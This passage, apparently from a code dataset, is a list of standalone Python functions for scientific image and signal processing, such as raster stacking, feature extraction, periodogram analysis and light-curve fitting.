ticks=np.linspace(0,int(avg_raster.max()),int(avg_raster.max()+1)), drawedges=True)\n\n plt.show()\n plt.close()\n\n\n # gdal_array.SaveArray(new_raster, tifs[0][:-4]+\"_stacked_.tiff\")", "def pick_triplets_images(images, n_triplets):\n\n indices = _pick_triplets(len(images), n_triplets)\n\n n_samples = len(indices)\n\n n_rows, n_cols, n_channels = images[0].shape\n\n images_samples = np.zeros((n_samples,n_rows, n_cols, n_channels), dtype = np.uint8)\n\n for i, index in enumerate(indices):\n images_samples[i] = images[index]\n\n return images_samples", "def extract_features_2d(\n dim,\n img,\n n_sigmas,\n intensity=True,\n edges=True,\n texture=True,\n sigma_min=0.5,\n sigma_max=16\n):\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features from channel %i' % (dim))\n\n # computations are faster as float32\n img = img_as_float32(img)\n\n sigmas = np.logspace(\n np.log2(sigma_min),\n np.log2(sigma_max),\n num=n_sigmas, #int(np.log2(sigma_max) - np.log2(sigma_min) + 1),\n base=2,\n endpoint=True,\n )\n\n if (psutil.virtual_memory()[0]>10000000000) & (psutil.virtual_memory()[2]<50): #>10GB and <50% utilization\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features in parallel')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n all_results = Parallel(n_jobs=-2, verbose=0)(delayed(features_sigma)(img, sigma, intensity=intensity, edges=edges, texture=texture) for sigma in sigmas)\n else:\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Extracting features in series')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n n_sigmas = len(sigmas)\n all_results = [\n features_sigma(img, sigma, intensity=intensity, edges=edges, texture=texture)\n for sigma in sigmas\n ]\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Features from channel %i for all scales' % (dim))\n\n return list(itertools.chain.from_iterable(all_results))", "def update_for_in_trap(self, t, traps): #******\n sources = traps.param['source_locations'] #Of format [(0,0),]\n for trap_num, trap_loc in enumerate(sources):\n dist_vals = distance((self.x_position, self.y_position),trap_loc)\n mask_trapped = dist_vals < traps.param['trap_radius']\n self.mode[mask_trapped] = self.Mode_Trapped\n self.trap_num[mask_trapped] = trap_num\n self.x_trap_loc[mask_trapped] = trap_loc[0]\n self.y_trap_loc[mask_trapped] = trap_loc[1]\n self.x_velocity[mask_trapped] = 0.0\n self.y_velocity[mask_trapped] = 0.0\n\n # Get time stamp for newly trapped flies\n mask_newly_trapped = mask_trapped & (self.t_in_trap == scipy.inf)\n self.t_in_trap[mask_newly_trapped] = t", "def extract_templates(im, interactive = False):\n\n im = np.flipud(im)\n# tmp = cv2.medianBlur(im, 5)\n# tmp = cv2.threshold(tmp, 255*0.65, 255, cv2.THRESH_BINARY)[1]\n\n im_filtered = filter_specgram(im, interactive)\n _, contours, _ = cv2.findContours(\n im_filtered,\n cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE\n )\n\n templates = []\n\n im_dbg_template_rejected = None\n im_dbg_template_overlay = None\n if interactive:\n im_dbg_template_rejected = im.copy()\n im_dbg_template_overlay = im.copy()\n\n #im_dbg_template_overlay *= 255/im_dbg_template_overlay.max()\n\n\n # apply trunc threshold\n # apply gaussian blur\n # apply binary threshold\n # remove small blobs\n # remove huge blobs\n # for each blob, check surrounding blobs within given radius and add \n # (how to choose which to add? what radius?\n smallest = -1\n average_val = np.average(im)\n print 'average: {}'.format(average_val)\n\n for i in xrange(len(contours)):\n r = cv2.boundingRect(contours[i])\n\n left = max(0, r[0] - 10)\n top = max(0, r[1] - 10)\n right = min(len(im[0]), r[0] + r[2] + 10)\n bottom = min(len(im), r[1] + r[3] + 10)\n\n area = r[2] * r[3]\n\n #TODO: use average values from sgram?\n if area < 50 or area > 10000: # : continue\n #if area > 10000:\n if not interactive: continue\n# cv2.putText(im_dbg_template_rejected, '{}'.format(area),\n# (left, top), cv2.FONT_HERSHEY_PLAIN, 1.0,\n# int(np.max(im_dbg_template_rejected)))\n cv2.rectangle(im_dbg_template_rejected, (left,top), (right,bottom), int(np.max(im_dbg_template_rejected)), 1)\n continue\n\n if smallest == -1 or area < smallest: smallest = area\n\n x = im[top:bottom, left:right]\n #x = im[r[1]:r[1]+r[3], r[0]:r[0]+r[2]]\n if np.min(x) >= average_val:\n if not interactive: continue\n cv2.putText(im_dbg_template_rejected, 'v:{}'.format(np.average(x)), (left, top), cv2.FONT_HERSHEY_PLAIN, 1.0, int(np.max(im_dbg_template_rejected)))\n cv2.rectangle(im_dbg_template_rejected, (left,top), (right,bottom), int(np.max(im_dbg_template_rejected)), 1)\n continue\n x = cv2.GaussianBlur(x, (0,0), 1.5)\n templates.append(x)\n\n if interactive:\n cv2.rectangle(im_dbg_template_overlay, (left, top), (right, bottom), int(np.max(im_dbg_template_overlay)), 1)\n #cv2.rectangle(im_dbg_template_overlay, (r[0]-10, r[1]-10), (r[0]+r[2]+10, r[1]+r[3]+10), (255,0,0), 1)\n if interactive:\n plotMultiple([im_dbg_template_overlay, im_dbg_template_rejected],\n #plotMultiple([im_filtered, im_dbg_template_rejected],\n None,\n ['templates', 'rejected'])\n\n\n# cv2.namedWindow('orig')\n# cv2.imshow('orig', im_dbg_template_overlay)\n# cv2.namedWindow('rejected')\n# cv2.imshow('rejected', im_dbg_template_rejected)\n # plt.imshow(im_dbg_template_overlay, aspect='auto')\n # plt.show()\n print 'smallest: {}'.format(smallest)\n plt_(im_dbg_template_rejected,'reject')\n plt_(im_dbg_template_overlay,'accept')\n# while cv2.waitKey(0) != ord('n'):\n# pass\n\n return templates", "def dump_psth_peaks(ffname, outprefix, celltype, window=100e-3, binwidth=5e-3):\n with open('{}_psth_{}_{}ms_window_{}ms_bins.csv'.format(outprefix, celltype, window*1e3, binwidth*1e3), 'wb') as fd:\n writer = csv.writer(fd, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n dbcnt_flist = get_dbcnt_dict(ffname)\n bins = np.arange(-window / 2.0, window / 2.0 + 0.5 * binwidth, binwidth)\n writer.writerow(['dbcount', 'filename'] + list(np.asarray(np.round(bins[1:]*1e3), dtype=int)))\n for dbcnt, flist in dbcnt_flist.items():\n for fname in flist:\n data = TraubData(makepath(fname))\n pop_train_list = []\n bgtimes, probetimes = get_stim_times(data, correct_tcr=True)\n if (len(bgtimes) == 0) and (len(probetimes) == 0):\n print 'EE: {} has no TCR spiking on stimulus.'.format(fname)\n continue\n stim_times = np.concatenate((bgtimes, probetimes))\n stim_times.sort()\n # print '###', stim_times\n for cell, train in data.spikes.items():\n if cell.startswith(celltype):\n pop_train_list.append(train)\n pop_train = np.concatenate(pop_train_list)\n pop_train.sort()\n \n bgpsth, b = psth(pop_train, stim_times, window=window, bins=bins)\n bgpsth /= (data.cellcounts._asdict()[celltype] * binwidth)\n writer.writerow([dbcnt, fname] + list(bgpsth))", "def peaks_mc(t, y, e, thresh=0, N_trials=5000, N_peaks=None, **pgram_kwargs):\n tstart = timeit.default_timer()\n\n def do_trial(**kwargs):\n y_jig = np.random.normal(y, e)\n periods, power = lombscargle(t, y_jig, **kwargs)\n peaks = peak_indices(power, thresh=thresh)\n pk_periods = periods[peaks]\n pk_power = power[peaks]\n if N_peaks is not None and pk_periods.size >= N_peaks:\n pk_periods = pk_periods[0:N_peaks]\n pk_power = power[0:N_peaks]\n return periods, pk_periods, pk_power\n \n # Do one trial to get the periods\n periods, mc_pk_periods, mc_pk_power = do_trial(**pgram_kwargs)\n \n # Now do the rest\n for i in range(N_trials - 1):\n periods, pk_periods, pk_power = do_trial(periods=periods)\n mc_pk_periods = np.append(mc_pk_periods, pk_periods)\n mc_pk_power = np.append(mc_pk_power, pk_power)\n tend = timeit.default_timer()\n print(\"trials=%i peaks=%i thresh=%0.3g\" % (N_trials, mc_pk_periods.size, thresh))\n print(\"%i trials of %i samples to %i periods in %f s\" % \\\n (N_trials, y.size, periods.size, tend - tstart))\n return mc_pk_periods, mc_pk_power", "def tqumap_homog_noise( pix, nlev_t, nlev_p):\n nx, dx, ny, dy = pix.nx, pix.dx, pix.ny, pix.dy\n \n ret = maps.tqumap( nx, dx, ny=ny, dy=dy )\n ret.tmap += np.random.standard_normal(ret.tmap.shape) * nlev_t / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n ret.qmap += np.random.standard_normal(ret.qmap.shape) * nlev_p / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n ret.umap += np.random.standard_normal(ret.umap.shape) * nlev_p / (180.*60./np.pi*np.sqrt(ret.dx * ret.dy))\n return ret", "def test_gaussian():\n generator = SignalGenerator()\n data = generator.random_gaussian(means=[1, 0, -1], stds=[0.1, 0.1, 0.1])\n freq_features = FrequencyFeature(data, sr=50)\n freq_features.fft().peaks()\n top_n = range(1, 11)\n top_n_dominant_frequencies = np.concatenate(\n list(map(freq_features.dominant_frequency_power, top_n)), axis=0)\n std_top_n_dfs = np.std(top_n_dominant_frequencies, axis=0)\n assert np.all(std_top_n_dfs < 0.001)", "def countmap(band,skypos,tranges,skyrange,width=False,height=False,\n\t\t\t verbose=0,tscale=1000.,memlight=False,hdu=False,retries=20):\n\timsz = gxt.deg2pix(skypos,skyrange)\n\tcount = np.zeros(imsz)\n\tfor trange in tranges:\n\t\t# If memlight is requested, break the integration into\n\t\t# smaller chunks.\n\t\tstep = memlight if memlight else trange[1]-trange[0]\n\t\tfor i in np.arange(trange[0],trange[1],step):\n\t\t\tt0,t1=i,i+step\n\t\t\tif verbose:\n\t\t\t\tprint_inline('Coadding '+str(t0)+' to '+str(t1))\n\t\t\tevents = gQuery.getArray(gQuery.rect(band,skypos[0],skypos[1],t0,t1,\n\t\t\t\t\t\t\t\t\t\t\t\t skyrange[0],skyrange[1]),\n\t\t\t\t\t\t\t\t\t verbose=verbose,retries=retries)\n\n\t\t\t# Check that there is actually data here.\n\t\t\tif not events:\n\t\t\t\tif verbose>1:\n\t\t\t\t\tprint \"No data in \"+str([t0,t1])\n\t\t\t\tcontinue\n\n\t\t\ttimes = np.array(events,dtype='float64')[:,0 ]/tscale\n\t\t\tcoo =\tnp.array(events,dtype='float64')[:,1:]\n\n\t\t\t# If there's no data, return a blank image.\n\t\t\tif len(coo)==0:\n\t\t\t\tif verbose:\n\t\t\t\t\tprint 'No data in this frame: '+str([t0,t1])\n\t\t\t\tcontinue\n\n\t\t\t# Define World Coordinate System (WCS)\n\t\t\twcs = define_wcs(skypos,skyrange,width=False,height=False)\n\n\t\t\t# Map the sky coordinates onto the focal plane\n\t\t\tfoc = wcs.sip_pix2foc(wcs.wcs_world2pix(coo,1),1)\n\n\t\t\t# Bin the events into actual image pixels\n\t\t\tH,xedges,yedges=np.histogram2d(foc[:,1]-0.5,foc[:,0]-0.5,\n\t\t\t\t\t\t\t\tbins=imsz,range=([ [0,imsz[0]],[0,imsz[1]] ]))\n\t\t\tcount += H\n\n\treturn count", "def airgaps_from_sequence(self, seq_model, tfrms):\n for e in self.elements:\n if isinstance(e, AirGap):\n return # found an AirGap, model probably OK\n\n num_elements = 0\n seq_model = self.opt_model.seq_model\n for i, g in enumerate(seq_model.gaps):\n if g.medium.name().lower() == 'air':\n if i > 0:\n s = seq_model.ifcs[i]\n tfrm = tfrms[i]\n self.process_airgap(seq_model, i, g, s, tfrm,\n num_elements, add_ele=False)", "def find_peaks_(image):\n\n height, width = image.shape[:2]\n img_matrix = [sum(i)/len(i) for i in image]\n x=[i for i in range(height)]\n y = [255-i for i in img_matrix]\n y = gaussian_filter(y, sigma=20)\n maxs, _ = find_peaks(y)\n maxs = maxs.tolist()\n\n return maxs", "def make_td_images(td, num_spikes, step_factor=1):\n assert isinstance(td, ev.Events)\n assert isinstance(num_spikes, int)\n assert num_spikes > 0\n assert step_factor > 0\n\n # with timer.Timer() as my_timer:\n event_offset = 0\n images = []\n while event_offset + num_spikes < td.data.size:\n image = np.zeros((td.height, td.width), dtype=np.uint8)\n unique_spike_count = 0\n index_ptr = event_offset\n while (unique_spike_count < num_spikes) & (index_ptr < td.data.size):\n event = td.data[index_ptr]\n y = event.y\n x = event.x\n if image[y, x] == 0:\n image[y, x] = 255\n unique_spike_count += 1\n\n index_ptr += 1\n\n # cv2.imshow('img', img)\n # cv2.waitKey(1)\n if unique_spike_count < num_spikes:\n break\n\n images.append(image)\n\n # offset next image\n total_spikes_traversed = index_ptr - event_offset\n event_offset += math.floor(total_spikes_traversed * step_factor) + 1\n # print 'Making images out of bin file took %s seconds' % my_timer.secs\n\n return images", "def transform(self, imgList):\n res = []\n for img in tqdm(imgList):\n y_mean = np.mean(img, axis=1)\n self.get_filtration(y_mean)\n seg = self.get_segments()\n seg = sorted(seg, key=lambda x:x[0])\n res.append(seg)\n return res", "def getstats(img, thresholds):\n number = np.zeros(img.shape, np.float64)\n ev = np.zeros(img.shape, np.float64)\n scatter = np.zeros(img.shape, np.float64)\n for n, s, low, high, evs in thresholds:\n for i in numba.prange(img.shape[0]):\n for j in numba.prange(img.shape[1]):\n if (low < img[i, j]) and (img[i, j] < high):\n scatter[i, j] = s\n number[i, j] = n\n ev[i, j] = img[i, j] - evs\n return ev, number, scatter", "def multi_sigma_noise_sampling(qubit, tstep, sigma_array, num_samples):\n\n noise_samples0 = np.linspace(-5*sigma_array[-1], 5*sigma_array[-1], num_samples)\n average_chi_array0, raw_chi_array0 = process_noise(qubit, tstep, noise_samples0, sigma_array)\n \n converge_value = 1.0\n num_runs = 1\n # Used to progressively refine the sampling space\n sig_index = -1\n\n while converge_value > 1e-7:\n if num_runs % 3 == 0:\n noise_samples1 = wing_doubling(noise_samples0, sigma_array[sig_index])\n else:\n noise_samples1 = two_sigma_doubling(noise_samples0, sigma_array[sig_index])\n average_chi_array1, raw_chi_array1 = process_noise(qubit, tstep, noise_samples1, sigma_array)\n\n converge_array = np.zeros((len(sigma_array)))\n\n diff_matrix = average_chi_array1 - average_chi_array0\n converge_array = np.real(np.sqrt(\n np.einsum('ijj',\n np.einsum('ijk,ikm->ijm', diff_matrix, \n np.einsum('ikj', diff_matrix.conj())))))\n \n # Ensure that all of the individual chi-matrices have converged\n converge_value = np.max(converge_array)\n for i, norm in reversed(list(enumerate(converge_array))):\n if norm < 1e-8:\n sig_index = i\n break\n\n noise_samples0 = noise_samples1\n average_chi_array0 = average_chi_array1\n raw_chi_array0 = raw_chi_array1\n print(converge_array)\n print(num_runs)\n num_runs += 1\n return len(noise_samples1), average_chi_array1", "def get_spike_times_ps(nn, n_ps=1, frac=1.):\n sp = []\n n = 0\n for gr in nn.p_ass_index[n_ps]:\n for nrn in gr[0:frac * len(gr)]:\n for t in nn.mon_spike_e[nrn]:\n sp.append((n, t))\n n += 1\n\n return sp", "def findRMpeaks(self, pix, threshold):\n\t\tsigma = np.std(self.getz(pix))\n\t\tdetections = []\n\t\tfor i, phi in enumerate(self.getz(pix)):\n \t\t \tif phi > threshold*sigma: detections.append(i)\n \t \treturn detections", "def get_amplitude_map(self, timeWindow=(0, 0.5)):\n\n windowIndex = np.logical_and(self.time>=timeWindow[0], self.time<=timeWindow[1])\n\n indON,indOFF,allAltPos,allAziPos = self._sort_index()\n\n ampON = np.zeros(indON.shape); ampON[:]=np.nan; ampOFF = ampON.copy()\n\n for i in np.ndindex(indON.shape):\n traceIndON = indON[i]; traceIndOFF = indOFF[i]\n if traceIndON is not None: ampON[i] = np.mean(np.mean(self.data[traceIndON]['traces'],axis=0)[windowIndex])\n if traceIndOFF is not None: ampOFF[i] = np.mean(np.mean(self.data[traceIndOFF]['traces'],axis=0)[windowIndex])\n\n return ampON, ampOFF, allAltPos, allAziPos", "def averageTrialsByTriggers(trigger_indices, np_data):\n trialLen = trigger_indices[1] -trigger_indices[0] -1\n data_avg = [] \n data_std = [] \n\n for i in trigger_indices:\n data_avg.append(numpy.average(np_data[i+1:i+trialLen-1])) \n data_std.append(numpy.std(np_data[i+1:i+trialLen-1])) \n \n return (data_avg, data_std)", "def bayes_matting(img, trimap, sigma_d=10, it=1):\n assert img.shape[:-1] == trimap.shape\n\n img = img / 255.0\n nrows, ncols = img.shape[:-1]\n\n # initial alpha guess\n alpha = np.zeros(trimap.shape)\n alpha[trimap == 255] = 1\n alpha[trimap == 128] = 0.5\n\n B = img[alpha == 0] # background pixel mask\n F = img[alpha == 1] # foreground pixel mask\n\n mean_B = np.mean(B, axis=0)\n cov_B = np.cov(B.T)\n mean_F = np.mean(F, axis=0)\n cov_F = np.cov(F.T)\n\n try:\n inv_cov_B = np.linalg.inv(cov_B)\n inv_cov_F = np.linalg.inv(cov_F)\n except LinAlgError:\n print(\"LinAlgError\")\n\n for i in range(it):\n print(\"Iteration {}\".format(i))\n for row in range(nrows):\n for col in range(ncols):\n if trimap[row, col] == 128:\n f, g = calculate_fg(img[row, col], alpha[row, col], mean_F, inv_cov_F, mean_B, inv_cov_B, sigma_d)\n alpha[row, col] = calculate_alpha(img[row, col], f, g)\n\n alpha = np.clip(alpha, 0, 1)\n\n return alpha", "def proc_modscag(fn_list, extent=None, t_srs=None):\n #Use cubic spline here for improve upsampling \n ds_list = warplib.memwarp_multi_fn(fn_list, res='min', extent=extent, t_srs=t_srs, r='cubicspline')\n stack_fn = os.path.splitext(fn_list[0])[0] + '_' + os.path.splitext(os.path.split(fn_list[-1])[1])[0] + '_stack_%i' % len(fn_list) \n #Create stack here - no need for most of mastack machinery, just make 3D array\n #Mask values greater than 100% (clouds, bad pixels, etc)\n ma_stack = np.ma.array([np.ma.masked_greater(iolib.ds_getma(ds), 100) for ds in np.array(ds_list)], dtype=np.uint8)\n\n stack_count = np.ma.masked_equal(ma_stack.count(axis=0), 0).astype(np.uint8)\n stack_count.set_fill_value(0)\n stack_min = ma_stack.min(axis=0).astype(np.uint8)\n stack_min.set_fill_value(0)\n stack_max = ma_stack.max(axis=0).astype(np.uint8)\n stack_max.set_fill_value(0)\n stack_med = np.ma.median(ma_stack, axis=0).astype(np.uint8)\n stack_med.set_fill_value(0)\n\n out_fn = stack_fn + '_count.tif'\n iolib.writeGTiff(stack_count, out_fn, ds_list[0])\n out_fn = stack_fn + '_max.tif'\n iolib.writeGTiff(stack_max, out_fn, ds_list[0])\n out_fn = stack_fn + '_min.tif'\n iolib.writeGTiff(stack_min, out_fn, ds_list[0])\n out_fn = stack_fn + '_med.tif'\n iolib.writeGTiff(stack_med, out_fn, ds_list[0])\n\n ds = gdal.Open(out_fn)\n return ds", "def all_feature_extractor(imgpath):\r\n\r\n image = cv2.imread(imgpath)\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\r\n # Extracting Gabor Features\r\n feature_dict = gabor_feature_extractor(image)\r\n\r\n feature_dict['Original'] = image\r\n\r\n entropy_img = entropy(image, disk(1))\r\n feature_dict['Entropy'] = entropy_img\r\n\r\n gaussian3_img = nd.gaussian_filter(image, sigma=3)\r\n feature_dict['Gaussian3'] = gaussian3_img\r\n\r\n gaussian7_img = nd.gaussian_filter(image, sigma=7)\r\n feature_dict['Gaussian7'] = gaussian7_img\r\n\r\n sobel_img = sobel(image)\r\n feature_dict['Sobel'] = sobel_img\r\n\r\n canny_edge_img = cv2.Canny(image, 100, 200)\r\n feature_dict['Canny'] = canny_edge_img\r\n\r\n robert_edge_img = roberts(image)\r\n feature_dict['Robert'] = robert_edge_img\r\n\r\n scharr_edge = scharr(image)\r\n feature_dict['Scharr'] = scharr_edge\r\n\r\n prewitt_edge = prewitt(image)\r\n feature_dict['Prewitt'] = prewitt_edge\r\n\r\n median_img = nd.median_filter(image, size=3)\r\n feature_dict['Median'] = median_img\r\n\r\n variance_img = nd.generic_filter(image, np.var, size=3)\r\n feature_dict['Variance'] = variance_img\r\n\r\n return feature_dict", "def get_stamps(full_image, Args):\n print (\"getting individual stamps\")\n nrows = int(np.ceil(Args.num / Args.num_columns)) # Total number of rows\n out_size = Args.out_size\n low = int(Args.in_size / 2 - out_size / 2)\n high = int(Args.in_size / 2 + out_size / 2)\n nStamp = (nrows, Args.num_columns)\n stampSize = Args.in_size\n s2 = np.hstack(np.split(full_image,nStamp[0])).T.reshape(nStamp[0]*nStamp[1],\n stampSize, stampSize)\n stamps = s2[:, low:high, low:high]\n return stamps", "def getstretchlimits(tiffile):\n im = gdal.Open(tiffile)\n imarray = np.dstack(\n [\n im.GetRasterBand(1).ReadAsArray(),\n im.GetRasterBand(2).ReadAsArray(),\n im.GetRasterBand(3).ReadAsArray(),\n ]\n )\n\n # imarray = imarray[imarray > 10] # get rid of the values near zero\n # return (imarray.dtype, imarray.shape)\n return [np.percentile(imarray, 1), np.percentile(imarray, 99)]", "def get_template_series(self, nb_images):\n\n # Tab for the series of images\n self.template = []\n\n # Tab\n temp = []\n\n # Make current position the zero position\n self.arm.set_to_zero([0, 1, 2])\n self.microscope.set_to_zero([0, 1, 2])\n\n # Take imges only in the template zone\n template = self.template_zone()\n height, width = template.shape[:2]\n\n # Tab of weight to detect where the pipette is\n weight = []\n\n # Detecting the tip\n for i in range(3):\n for j in range(3):\n if (i != 1) & (j != 1):\n # divide template zone into 8 images\n temp = template[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n\n # Search the tip using the number of darkest pixel in the image\n bin_edge, _ = np.histogram(temp.flatten())\n weight += [bin_edge.min()]\n else:\n # image is the center of template zone, do not consider to have functional get_withdraw_sign method\n weight += [-1]\n\n # pipette is in the image with the most darkest pixels\n index = weight.index(max(weight))\n j = index % 3\n i = index // 3\n\n # Update the position of the tip in image\n self.template_loc = [temp.shape[1] * (1 - j / 2.), temp.shape[0] * (1 - i / 2.)]\n\n # Get the series of template images at different height\n for k in range(nb_images):\n self.microscope.absolute_move(k - (nb_images - 1) / 2, 2)\n self.microscope.wait_motor_stop(2)\n time.sleep(1)\n img = self.template_zone()\n height, width = img.shape[:2]\n img = img[i * height / 4:height / 2 + i * height / 4, j * width / 4:width / 2 + j * width / 4]\n self.template += [img]\n\n # reset position at the end\n self.go_to_zero()\n pass", "def apply_gaussian(X, sigma):\n return np.array([ndimage.gaussian_filter(x, sigma) for x in X])", "def get_brightest_mean(self, num_pix=3):\n peak_x = np.zeros(\n [len(self.pixel_x)]) # Create blank arrays for peaks\n # rather than a dict (faster)\n peak_y = np.zeros(peak_x.shape)\n peak_amp = np.zeros(peak_x.shape)\n\n # Loop over all tels to take weighted average of pixel\n # positions This loop could maybe be replaced by an array\n # operation by a numpy wizard\n\n tel_num = 0\n for tel in self.image:\n top_index = self.image[tel].argsort()[-1 * num_pix:][::-1]\n print(top_index, self.pixel_x[tel][top_index],\n self.image[tel][top_index])\n weight = self.image[tel][top_index]\n weighted_x = self.pixel_x[tel][top_index] * weight\n weighted_y = self.pixel_y[tel][top_index] * weight\n\n ppx = np.sum(weighted_x) / np.sum(weight)\n ppy = np.sum(weighted_y) / np.sum(weight)\n\n peak_x[tel_num] = ppx # Fill up array\n peak_y[tel_num] = ppy\n peak_amp[tel_num] = np.sum(weight)\n tel_num += 1\n\n self.peak_x = peak_x # * unit # Add to class member\n self.peak_y = peak_y # * unit\n self.peak_amp = peak_amp", "def where_are_gaussians(img):\n list_of_sigmas = [40,30,20,10]\n mask=np.zeros(img.shape,dtype=bool)\n for sigma in list_of_sigmas:\n stack_to_remove,locs=find_gaussian(img.astype(np.uint8),sigma)\n w = stack_to_remove[:,:,0].shape[0]\n a,b=np.ogrid[-w/2:w/2,-w/2:w/2]\n for i in range(stack_to_remove.shape[2]):\n pt=(locs[0][i],locs[1][i])\n mask[pt[0]:pt[0]+w,pt[1]:pt[1]+w] = True\n return mask", "def getHists(img,bins=50):\n hists = np.array([])\n for i in range(3):#Images are loaded as three-dimensional matrices with three channels\n hists = np.append(hists,np.histogram(img[:,:,i], bins, density = True)[0])\n return hists", "def SIP(\n tpfs,\n sigma=5,\n min_period=10,\n max_period=100,\n nperiods=300,\n npca_components=2,\n aperture_threshold=3,\n sff=False,\n sff_kwargs={},\n):\n\n # Get the un-background subtracted data\n if hasattr(tpfs[0], \"flux_bkg\"):\n tpfs_uncorr = [\n (tpf + np.nan_to_num(tpf.flux_bkg))[\n np.isfinite(np.nansum(tpf.flux_bkg, axis=(1, 2)))\n ]\n for tpf in tpfs\n ]\n else:\n tpfs_uncorr = tpfs\n\n apers = [\n tpf.pipeline_mask\n if tpf.pipeline_mask.any()\n else tpf.create_threshold_mask(aperture_threshold)\n for tpf in tpfs_uncorr\n ]\n bkg_apers = [\n (~aper) & (np.nansum(tpf.flux, axis=0) != 0)\n for aper, tpf in zip(apers, tpfs_uncorr)\n ]\n lc = (\n lk.LightCurveCollection(\n [\n tpf.to_lightcurve(aperture_mask=aper)\n for tpf, aper in zip(tpfs_uncorr, apers)\n ]\n )\n .stitch(lambda x: x)\n .normalize()\n )\n lc.flux_err.value[~np.isfinite(lc.flux_err.value)] = np.nanmedian(lc.flux_err.value)\n\n # Run the same routines on the background pixels\n lc_bkg = (\n lk.LightCurveCollection(\n [\n tpf.to_lightcurve(aperture_mask=bkg_aper)\n for tpf, bkg_aper in zip(tpfs_uncorr, bkg_apers)\n ]\n )\n .stitch(lambda x: x)\n .normalize()\n )\n lc_bkg.flux_err.value[~np.isfinite(lc_bkg.flux_err.value)] = np.nanmedian(\n lc_bkg.flux_err.value\n )\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n bkgs = [\n lk.correctors.DesignMatrix(tpf.flux.value[:, bkg_aper], name=\"bkg\")\n .pca(npca_components)\n .append_constant()\n .to_sparse()\n for tpf, bkg_aper in zip(tpfs_uncorr, bkg_apers)\n ]\n for bkg in bkgs:\n bkg.prior_mu[-1] = 1\n bkg.prior_sigma[-1] = 0.1\n\n bkg.prior_mu[:-1] = 0\n bkg.prior_sigma[:-1] = 0.1\n\n # Split at the datadownlink\n bkgs = [\n bkg.split(list((np.where(np.diff(tpf.time.jd) > 0.3)[0] + 1)))\n for bkg, tpf in zip(bkgs, tpfs_uncorr)\n ]\n systematics_dm = vstack(bkgs)\n\n sigma_f_inv = sparse.csr_matrix(1 / lc.flux_err.value[:, None] ** 2)\n\n def fit_model(lc, mask=None, return_model=False):\n if mask is None:\n mask = np.ones(len(lc.flux.value), bool)\n sigma_w_inv = dm.X[mask].T.dot(dm.X[mask].multiply(sigma_f_inv[mask])).toarray()\n sigma_w_inv += np.diag(1.0 / dm.prior_sigma ** 2)\n\n B = dm.X[mask].T.dot((lc.flux.value[mask] / lc.flux_err.value[mask] ** 2))\n B += dm.prior_mu / dm.prior_sigma ** 2\n w = np.linalg.solve(sigma_w_inv, B)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n werr = ((np.linalg.inv(sigma_w_inv)) ** 0.5).diagonal()\n if return_model:\n return dm.X.dot(w)\n return w, werr\n\n # Make a dummy design matrix\n period = 27\n ls_dm = lk.correctors.DesignMatrix(\n lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / period, bias=False, nterms=1\n ),\n name=\"LS\",\n ).to_sparse()\n dm = lk.correctors.SparseDesignMatrixCollection(\n [systematics_dm, ls_dm]\n ).to_designmatrix(name=\"design_matrix\")\n\n if sff:\n sff_dm = []\n for tpf in tpfs_uncorr:\n s = lk.correctors.SFFCorrector(tpf.to_lightcurve())\n _ = s.correct(**sff_kwargs)\n sff_dm.append(s.dmc[\"sff\"].to_sparse())\n sff_dm = vstack(sff_dm)\n dm = lk.correctors.SparseDesignMatrixCollection([dm, sff_dm]).to_designmatrix(\n name=\"design_matrix\"\n )\n\n # Do a first pass at 27 days, just to find ridiculous outliers\n mod = fit_model(lc, return_model=True)\n mask = ~(lc - mod * lc.flux.unit).remove_outliers(return_mask=True, sigma=sigma)[1]\n\n # Loop over some periods we care about\n periods = 1 / np.linspace(1 / min_period, 1 / max_period, nperiods)\n ws = np.zeros((len(periods), dm.X.shape[1]))\n ws_err = np.zeros((len(periods), dm.X.shape[1]))\n ws_bkg = np.zeros((len(periods), dm.X.shape[1]))\n ws_err_bkg = np.zeros((len(periods), dm.X.shape[1]))\n\n for idx, period in enumerate(tqdm(periods, desc=\"Running pixels in aperture\")):\n dm.X[:, -ls_dm.shape[1] :] = lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / period, bias=False, nterms=1\n )\n ws[idx], ws_err[idx] = fit_model(lc, mask=mask)\n ws_bkg[idx], ws_err_bkg[idx] = fit_model(lc_bkg, mask=mask)\n power = (ws[:, -2] ** 2 + ws[:, -1] ** 2) ** 0.5\n am = np.argmax(power)\n dm.X[:, -ls_dm.shape[1] :] = lombscargle.implementations.mle.design_matrix(\n lc.time.jd, frequency=1 / periods[am], bias=False, nterms=1\n )\n mod = dm.X[:, :-2].dot(ws[am][:-2])\n\n power_bkg = (ws_bkg[:, -2] ** 2 + ws_bkg[:, -1] ** 2) ** 0.5\n\n r = {\n \"periods\": periods,\n \"power\": power,\n \"raw_lc\": lc,\n \"power_bkg\": power_bkg,\n \"raw_lc_bkg\": lc_bkg,\n \"corr_lc\": lc - mod * lc.flux.unit + 1,\n \"period_at_max_power\": periods[am],\n }\n\n return r", "def _compute_stack_mean_and_uncertainty(self, starMask, iters=5,\n backgroundClipSigma=5.0, starClipSigma=40.0):\n # Extract the number of images (nz) and the shape of the images (ny, nx)\n nz, ny, nx = self.shape\n\n # Test for the number of bits in each pixel (or just assum 64 bits)\n bitsPerPixel = 64\n\n # Compute the number of rows to process at a given time\n numberOfRows, numSections = self._get_number_of_rows_to_process(bitsPerPixel)\n print('Processing stack in {0} sections 